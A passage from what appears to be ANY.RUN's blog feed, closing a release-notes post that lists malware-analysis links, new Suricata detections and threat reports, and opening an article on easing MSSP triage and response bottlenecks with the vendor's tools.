<li><a href="https://app.any.run/tasks/f0f026b2-88c3-424d-b612-5619e1a382ec?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">DarkSideRAT</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/965d582a-35cf-42c7-a00e-c1f3585b6582?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">DarkCore</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/b3defee7-cc9d-48cc-836c-ab0ab41cbaf8?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">SynkLoader</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/0feedc64-2b73-423f-9fa7-af1220f40c9e?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">PlikanLocker</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/521a274b-ef0d-4bd1-b2ae-3929e496896d?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Celestium</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/25963b79-4b25-4630-8548-57b9f0972f4c?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Projextor</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/8c15ef1c-d9c4-48e0-a20f-1687fd37325c?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Evooo1Bot</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/bdb01790-61d1-41d6-9e8d-a91541b6bdb0?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Kynx</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/e88c3a34-eb2d-478d-86d9-ac69dda81001?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">FudRAT</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/4965e311-f4a5-4dd2-a5a9-2175ee240685?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">ChocoShell</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/073564ad-1cf6-4ef5-9384-32535c8fbe80?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">OxideStealer</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/1bf2b1a2-64ac-4006-a0c6-cf5d6f294df1?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">GhostDesk</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/613d58d6-d7ad-45d5-95c6-1581b4f14215?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">SpecterStealer</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/098ce199-9786-4969-ae42-ed7d5fd5e47d?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Golsta</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/8e936655-2788-4421-9891-8e04cc795204?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">ChainDrop</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/04c5f83d-44b2-4e84-af51-2a73e1b3bf12?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Aeternum</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/340a9d58-0171-4029-b82a-285713b6076d?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Abyssos</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/ea9e3824-b4c6-4cdb-a89c-77ef8666e8b3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">ToxNetV2</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/aaa28cb0-54ac-4fe0-a7c8-726754b9c45d?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">QtRouter</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/bdbe27fb-be07-4863-985d-02188a61bb25?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Nul1Dropper</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/c6ce0966-1139-4d22-8bbc-72c6e8ec515d?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">BotKing</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/164f07d0-f781-4a3e-9fb0-8baf44789671?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">XScreen</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/64989bd5-1308-4922-99da-c06b140d0688?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Amnesia</a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/91eadad1-8245-4f0a-a687-d8b8cee6f8b7?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">ToxicPanda</a> </li>
</ul>
</div>



<h3 class="wp-block-heading">New Suricata Rules </h3>



<p class="wp-block-paragraph">Network visibility also got a substantial update, with <strong>559 new Suricata rules</strong> added to detect suspicious traffic patterns tied to phishing, malware delivery, and command-and-control activity. The new rules help surface malicious behavior directly from network traffic and give analysts more context around how threats communicate and spread. </p>



<p class="wp-block-paragraph">Highlights include: </p>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/26a25650-98b8-4a3e-aa72-ccf44aaf3667/" target="_blank" rel="noreferrer noopener">Phish to RMM campaign related URL pattern</a> <em>(SID: 85008225):</em> Detects webpage lures disguised as Adobe Reader installer pages that lead to infection with RMM software. </li>



<li><a href="https://app.any.run/tasks/f21ff2a6-fd29-43e2-9cd7-13c8bc854074/" target="_blank" rel="noreferrer noopener">FlowerStorm HTTP activity observed</a> <em>(SID: 84004196):</em> Identifies HTTP activity associated with the FlowerStorm phishing-as-a-service platform. </li>



<li><a href="https://app.any.run/tasks/856203af-6d6c-46aa-ac2f-b6eea229b121/" target="_blank" rel="noreferrer noopener">OnyxC2 HTTP activity observed</a> <em>(SID</em><em>: 84004406): </em>Detects command-and-control check-in attempts linked to OnyxC2 malware-as-a-service activity. </li>
</ul>



<h2 class="wp-block-heading">New Threat Intelligence Reports </h2>



<p class="wp-block-paragraph">ANY.RUN published three new <a href="https://intelligence.any.run/reports?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktottireports" target="_blank" rel="noreferrer noopener">Threat Intelligence Reports</a>, covering active phishing operations, remote-access abuse, and newly observed malware. Available to <a href="https://intelligence.any.run/plans?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktotiplans" target="_blank" rel="noreferrer noopener">TI Lookup Premium</a> subscribers, the reports combine technical analysis with IOCs, hunting queries, infrastructure context, and MITRE ATT&amp;CK mapping to help analysts investigate and act on threats faster. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="581" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-reports-1024x581.png" alt="Threat Intelligence Reports available for deeper analysis" class="wp-image-22983" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-reports-1024x581.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-reports-300x170.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-reports-768x436.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-reports-1536x872.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-reports-2048x1162.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-reports-370x210.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-reports-270x153.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-reports-740x420.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Threat Intelligence Reports available for deeper analysis</em></figcaption></figure>
</div>


<h3 class="wp-block-heading">1. US-First RMM Phishing Campaign </h3>



<p class="wp-block-paragraph">The <a href="https://intelligence.any.run/reports/08-24-2026-cra-t4-rmm" target="_blank" rel="noreferrer noopener">US-First RMM Phishing Campaign report</a> uncovers a fake-document campaign that tricks victims into installing legitimate RMM software for remote access. What first looked like a Canada-focused tax lure turned out to be part of a broader operation spanning <strong>46 countries</strong>, with <strong>45% of observed activity associated with the United States</strong>. </p>



<p class="wp-block-paragraph">The report traces the campaign’s reusable phishing kit, rotating infrastructure, password-protected delivery chain, and abuse of tools such as GoTo Resolve, LogMeIn Rescue, ScreenConnect, and ConnectWise. </p>



<h3 class="wp-block-heading">2. Mirage2FA: A Phishing Service That Steals Microsoft 365 Sessions in Real Time </h3>



<p class="wp-block-paragraph">The <a href="https://intelligence.any.run/reports/08-17-2026-mirage2fa" target="_blank" rel="noreferrer noopener">Mirage2FA report</a> analyzes an active phishing-as-a-service operation targeting Microsoft 365 accounts through AiTM techniques. ANY.RUN researchers examined <strong>1,249 sandbox sessions</strong> and linked the campaign to <strong>9,332 potential compromise events across 4,532 potential victims</strong>, with <strong>63.7% of identified victims located in the United States</strong>. </p>



<p class="wp-block-paragraph">The report explores Mirage2FA’s browser-based stagers, recurring /xls/ loader pattern, WebSocket-based authentication relay, and session-cookie theft, as well as the infrastructure and recurring LINX markers that connect the operation to <strong>LinX Coders</strong>. </p>



<h3 class="wp-block-heading">3. OVERLORD RAT, CRPX0, and TRIBACK Loader </h3>



<p class="wp-block-paragraph">The <a href="https://intelligence.any.run/reports/2026-08-07-threat-brief-overlordrat-crpx0-triback" target="_blank" rel="noreferrer noopener">ANY.RUN Threat Brief</a> covers three distinct threats with very different capabilities: a cross-platform RAT, a modular stealer-ransomware framework, and an in-memory Windows loader. </p>



<p class="wp-block-paragraph">The brief highlights <strong>OVERLORD RAT’s</strong> encrypted WebSocket C2 and IDE task abuse, <strong>CRPX0’s</strong> credential theft, crypto-stealing, and ransomware capabilities, and <strong>TRIBACK Loader’s</strong> DLL sideloading and memory-resident execution. It also includes hunting queries, IOCs, and MITRE ATT&amp;CK mappings for each threat. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Get more capacity from the SOC you already have.</span> 
<br>
Reduce analyst effort and improve operational efficiency.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoenterprise#contact-sales " rel="noopener" target="_blank">
Increase SOC Capacity </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> provides interactive malware analysis and threat intelligence solutions used by more than 16,000 organizations and 700,000 security professionals worldwide. </p>



<p class="wp-block-paragraph">Its <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> helps SOC teams, MSSPs, and enterprise security teams safely analyze suspicious files, URLs, phishing pages, and malware while observing the attack chain in real time. Analysts can inspect processes, browser activity, network traffic, persistence, credential access, and other behaviors to understand what a threat is doing and respond faster. </p>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> turns data from real-world sandbox investigations into actionable context for threat hunting, detection, and incident response. Teams can pivot across indicators, uncover related infrastructure, connect individual findings to wider campaigns, and bring fresh threat data into existing security controls. </p>



<p class="wp-block-paragraph">ANY.RUN is <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II attested</a>, reflecting its commitment to strong security controls and customer data protection. By combining behavioral analysis with current threat intelligence, ANY.RUN helps security teams investigate threats faster, improve detection coverage, and contain malicious activity before it causes wider impact. </p>



<p class="wp-block-paragraph"><a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-august-2026&amp;utm_term=030926&amp;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noreferrer noopener"><strong>Integrate ANY.RUN into your SOC workflow →</strong></a><strong></strong> </p>
<p>The post <a href="https://any.run/cybersecurity-blog/release-notes-august-2026/">Release Notes: Faster TI Investigations, Fresh Threat Research, and 650+ Threat Coverage Updates</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/release-notes-august-2026/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Triage &amp; Response Bottlenecks Eating into MSSP Margins: How to Remove the Friction</title>
		<link>https://any.run/cybersecurity-blog/mssp-triage-response-bottlenecks/</link>
					<comments>https://any.run/cybersecurity-blog/mssp-triage-response-bottlenecks/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 02 Sep 2026 07:18:13 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=22958</guid>

					<description><![CDATA[<p>As MSSPs take on more clients, alert volumes grow fast. Analyst capacity usually doesn’t. That gap shows up in triage and response first. Teams spend too much time checking IOCs, switching between tools, rebuilding context, and escalating cases that could have been closed earlier. Across thousands of investigations, those extra minutes turn into slower response, [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/mssp-triage-response-bottlenecks/">Triage &amp; Response Bottlenecks Eating into MSSP Margins: How to Remove the Friction</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">As <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSPs</a> take on more clients, alert volumes grow fast. Analyst capacity usually doesn’t. </p>



<p class="wp-block-paragraph">That gap shows up in triage and response first. Teams spend too much time checking IOCs, switching between tools, rebuilding context, and escalating cases that could have been closed earlier. Across thousands of investigations, those extra minutes turn into slower response, more pressure on Tier 2, and higher delivery costs. </p>



<p class="wp-block-paragraph">Let’s look at the triage and response bottlenecks that quietly drive up MSSP workload, and how to remove them before they start eating into margins. </p>



<h2 class="wp-block-heading">See Where Triage &amp; Response Put Pressure on MSSP Margins </h2>



<p class="wp-block-paragraph">MSSP profitability depends on keeping the effort behind each client under control. The issue is rarely one dramatic delay. It’s the small, repeatable steps scattered across triage and response that quietly increase the amount of work behind every case.</p>



<p class="wp-block-paragraph">Some tie up Tier 1. Others pull in more expensive Tier 2 resources, extend case lifecycles, or create work that could have been avoided earlier. Together, they determine how much additional client volume the existing team can absorb before operational costs start catching up with growth.</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-370"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="6"
           data-wpID="370"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Bottleneck                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        What happens in the workflow                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Impact on MSSP margins                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Manual alert validation                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Analysts spend time gathering context before they can reach a verdict                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        More Tier 1 time per case                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Unnecessary Tier 2 escalations                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Routine cases reach senior analysts because Tier 1 lacks enough evidence                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Higher-cost resources get tied up                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Manual handoffs and reporting                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Analysts package findings and rebuild context between investigation stages                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Longer case lifecycles and duplicated work                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Outdated threat data                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Emerging malicious infrastructure is recognized later                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        More cases reach the triage queue                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Disconnected tools                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Investigation data has to move manually between security platforms                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        More context switching and slower response                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-370'>
table#wpdtSimpleTable-370{ table-layout: fixed !important; }
table#wpdtSimpleTable-370 td, table.wpdtSimpleTable370 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">The more of these bottlenecks remain in the workflow, the harder it becomes to grow the client base without growing operational costs alongside it. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Remove the bottlenecks behind slower investigations.</span> 
<br>
Keep analyst workload from eating into MSSP margins.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/mssp/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=mssp-triage-response-bottlenecks&#038;utm_term=020926&#038;utm_content=linktomssp#contact-sales " rel="noopener" target="_blank">
Cut Triage &#038; Response Friction</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Bottleneck #1: Too Much Time Goes into Basic Alert Validation </h2>



<p class="wp-block-paragraph">Before analysts can decide what to do with an alert, they need enough context to understand whether it is actually malicious.</p>



<p class="wp-block-paragraph">That often means checking hashes, IPs, domains, and URLs across different sources, searching for related activity, and piecing the findings together manually. The individual steps are small, but Tier 1 has to repeat them throughout the day across different clients and investigations.</p>



<p class="wp-block-paragraph">Until that context is collected, the case cannot move forward, leaving analysts doing basic research instead of making the decision the alert actually needs. </p>



<h3 class="wp-block-heading">Give Tier 1 the Context to Decide Faster </h3>



<p class="wp-block-paragraph">With ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>, analysts can investigate suspicious indicators and related activity from one place instead of rebuilding context across multiple sources. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="585" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1024x585.png" alt="Threat Intelligence Lookup gives more context for deeper analysis" class="wp-image-22934" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1024x585.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-300x171.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-768x439.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1536x877.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-2048x1170.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-370x211.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-270x154.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-740x423.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Threat Intelligence Lookup gives more context for deeper analysis</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">They can search hashes, IPs, domains, URLs, processes, registry activity, and other artifacts, then pivot into connected infrastructure and previous malicious activity. This gives Tier 1 more evidence earlier in the workflow, helping analysts decide faster whether a case can be closed or needs deeper investigation. </p>



<p class="wp-block-paragraph">Cutting routine validation work gives Tier 1 more capacity for cases that actually need investigation. ANY.RUN can reduce Tier 1 workload by up to 20%, helping MSSPs support more clients without growing headcount at the same pace. </p>



<h2 class="wp-block-heading">Bottleneck #2: Too Many Cases Get Pushed to Tier 2 </h2>



<p class="wp-block-paragraph">When Tier 1 doesn’t have enough context to close a case confidently, escalation becomes the safer option. But every unnecessary handoff pulls a more experienced analyst into work that may not actually require Tier 2 expertise. </p>



<p class="wp-block-paragraph">The cost goes beyond the escalation itself. Tier 2 may need to review the alert, reconstruct what has already been checked, fill in missing context, and only then continue the investigation. Repeated across multiple clients, that eats into senior analyst capacity and makes each case more expensive to handle. </p>



<p class="wp-block-paragraph">Keeping more routine cases at Tier 1 reduces the amount of senior analyst time each client consumes. </p>



<h3 class="wp-block-heading">Help Tier 1 Close More Cases on Their Own </h3>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-triage-response-bottlenecks&amp;utm_term=020926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> gives Tier 1 analysts behavioral evidence they can use to make a stronger call earlier in the investigation. </p>



<p class="wp-block-paragraph"><a href="https://any.run/cybersecurity-blog/automated-interactivity-stage-two/" target="_blank" rel="noreferrer noopener">Automated Interactivity</a> handles many of the actions that would otherwise require manual analyst input. It can open attachments, follow links, extract URLs from QR codes, navigate redirects, solve CAPTCHA challenges, and launch payloads to expose multi-stage attacks automatically.  </p>


<div class="wp-block-image">
